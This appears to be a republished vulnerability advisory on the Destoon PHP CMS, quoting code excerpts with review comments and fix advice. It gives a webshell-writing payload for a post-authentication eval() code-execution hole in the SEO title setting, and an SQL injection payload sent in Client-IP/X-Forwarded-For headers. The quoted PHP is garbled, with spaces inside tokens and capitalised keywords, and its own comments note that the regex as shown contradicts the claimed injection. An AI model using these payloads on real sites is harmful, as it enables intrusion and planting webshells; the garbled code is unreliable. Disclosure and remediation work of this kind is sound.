# Team: makebugs
# Author: Fate
######################################## ####################################
// common.inc.php (excerpt): resolve the requested module id, then load the
// module's cached configuration and its language file.
$moduleid = intval($moduleid);

// Unknown module id: redirect to the site root instead of continuing.
if (!isset($MODULE[$moduleid])) {
    dheader(DT_PATH);
}

$module = $MODULE[$moduleid]['module'];
$MOD    = cache_read('module-'.$moduleid.'.php');

// Language strings for this module (path built from trusted config values only).
include DT_ROOT.'/lang/'.DT_LANG.'/'.$module.'.inc.php';
// destoon/module/know/index.inc.php (excerpt)
<?php
// www.2cto.com
// Access gate for the module index page: the visitor's group must be allowed by
// the module's "group_index" setting; otherwise the "no permission" message page
// is rendered and the request ends here.
$allowed = check_group($_groupid, $MOD['group_index']);
if (!$allowed) {
    $head_title = lang('message->without_permission');
    include template('noright', 'message');
    exit;
}
Include DT_ROOT. '/include/seo. inc. php ';
// Build the page title. $MOD['seo_index'] is the module's "SEO title" setting, which is
// edited in the backend ("Module Settings -> seo title"); presumably $seo_modulename,
// $seo_delimiter and $seo_sitename are defined by seo.inc.php above -- verify.
If ($ MOD ['seo _ Index']) {
// SECURITY: the stored setting is interpolated into a double-quoted PHP string and the
// result is passed to eval(). Any PHP expression embedded in the title (e.g. the
// "{${phpinfo()}}" complex syntax) is therefore executed when this page is rendered:
// stored code execution for anyone who can edit module settings. Filtering/escaping
// the title is not a reliable fix; the eval() should be replaced by a fixed-placeholder
// substitution (str_replace/strtr over a known list of names).
Eval ("\ $ seo_title = \" $ MOD [seo_index] \ ";");
} Else {
// Default title: module name, delimiter and site name.
$ Seo_title = $ seo_modulename. $ seo_delimiter. $ seo_sitename;
// Omitted -- the rest of the else branch and its closing brace are not part of this listing.
?>
Exploitation (requires backend access): in the admin backend, set Module Settings -> SEO title to a PHP "complex syntax" expression such as `{${phpinfo()}}`. Because the title is interpolated into a double-quoted string inside eval(), the expression runs when the module index page is rendered. The same technique with `fputs(fopen("path/5.php","w"),"<? eval(\$_POST[MakeBug]);?>")` as the expression writes a one-line webshell to a web-server-writable path. Note this is post-authentication -- it needs an account that can edit module settings -- but it yields code execution as the web-server user.
SQL injection via the client IP:
// destoon/include/global.func.php (excerpt)
// Returns an environment value selected by $type. Only the 'IP' case is reproduced in
// this excerpt; the remaining cases and the closing braces of the switch and of the
// function are omitted from the listing.
Function get_env ($ type ){
Switch ($ type ){
Case 'IP ':
$ DT_IP = '';
// SECURITY: proxy headers are consulted *before* REMOTE_ADDR. HTTP_CLIENT_IP and
// HTTP_X_FORWARDED_FOR are ordinary request headers chosen by the sender, so any client
// can put an arbitrary string here; only REMOTE_ADDR comes from the socket. (As listed
// the conditions use a single '&'; presumably '&&' in the real file -- verify.)
If (getenv ('HTTP _ CLIENT_IP ') & strcasecmp (getenv ('HTTP _ CLIENT_IP'), 'unknown ')){
$ DT_IP = getenv ('HTTP _ CLIENT_IP ');
} Elseif (getenv ('HTTP _ X_FORWARDED_FOR ') & strcasecmp (getenv ('HTTP _ X_FORWARDED_FOR'), 'unknown ')){
$ DT_IP = getenv ('HTTP _ X_FORWARDED_FOR ');
} Elseif (getenv ('remote _ ADDR ') & strcasecmp (getenv ('remote _ ADDR'), 'unknown ')){
$ DT_IP = getenv ('remote _ ADDR ');
} Elseif (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], 'unknown ')){
$ DT_IP = $ _ SERVER ['remote _ ADDR '];
}
// The only validation applied before the value is returned (and, per the text below,
// used in SQL). NOTE(review): as reproduced here the pattern is anchored with ^ and $,
// which would reject the "127.0.0.1', (SQL))#" payload quoted below; the injection only
// works if the deployed check is an unanchored/substring match, so confirm the exact
// regex against the affected version. A strict alternative is
// filter_var($DT_IP, FILTER_VALIDATE_IP), falling back to 'unknown'.
Preg_match ("/^ \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3} $/", $ DT_IP) or $ DT_IP = 'unknown ';
Return $ DT_IP;
Break;
The regex does not restrict the value to a well-formed address -- it only looks for digits and dots (the author evidently had only inputs like 127.0.0.1 in mind), and the value is later concatenated into SQL. Note that, as reproduced above, the pattern is anchored with ^ and $, which would reject the payload below; the injection requires the unanchored/substring form of the check, so confirm against the affected version. Payload: send `127.0.0.1', (SQL))#` in the Client-IP or X-Forwarded-For request header.
www.2cto.com fix: the suggestion to "filter illegal input from the title with the usual injection filtering" is not sufficient on its own. For the SEO title, stop passing the setting through eval() at all: build the title by substituting a fixed set of placeholders with str_replace()/strtr(). For the IP, validate with filter_var($DT_IP, FILTER_VALIDATE_IP) (or a strictly anchored regex) and fall back to 'unknown', and hand the value to the database through the DB layer's escaping or parameterized queries rather than string concatenation. Also reconsider trusting Client-IP / X-Forwarded-For at all: unless the site is behind a known proxy, use REMOTE_ADDR only.